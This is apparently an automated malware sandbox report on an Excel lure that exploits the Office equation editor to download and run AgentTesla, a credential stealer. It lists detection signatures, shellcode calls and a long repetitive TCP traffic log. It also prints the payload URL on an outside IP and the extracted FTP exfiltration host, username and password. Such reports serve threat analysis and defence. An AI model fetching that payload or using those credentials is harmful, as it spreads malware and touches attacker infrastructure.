Windows Analysis Report
Quotation - Optical Eyeglasses.xlsx

Overview

General Information

Sample Name: Quotation - Optical Eyeglasses.xlsx
Analysis ID: 680486
MD5: 936a314411e4a93f2dd6a01b51216ef3
SHA1: 47483467b595bdd9a49b577f457d84bcdb3b1c3b
SHA256: 0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
Tags: xlsx
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Quotation - Optical Eyeglasses.xlsx Virustotal: Detection: 35% Perma Link
Source: Quotation - Optical Eyeglasses.xlsx ReversingLabs: Detection: 31%
Antivirus detection for URL or domain
Source: http://198.12.89.152/mon/mon.exehhC: Avira URL Cloud: Label: malware
Source: ftp://ftp.alonsorojasmudanzasnacionales.com/okok Avira URL Cloud: Label: malware
Source: http://198.12.89.152/mon/mon.exe Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\Regasm_svchost.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.0.Regasm_svchost.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 6.0.Regasm_svchost.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Regasm_svchost.exe Jump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.89.152 Port: 80 Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities
barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05B6 ShellExecuteW,ExitProcess, 2_2_033F05B6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0588 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0588
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0531 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0531
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05A1 ShellExecuteW,ExitProcess, 2_2_033F05A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F045C ExitProcess, 2_2_033F045C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F05DB ExitProcess, 2_2_033F05DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0491 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0491
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
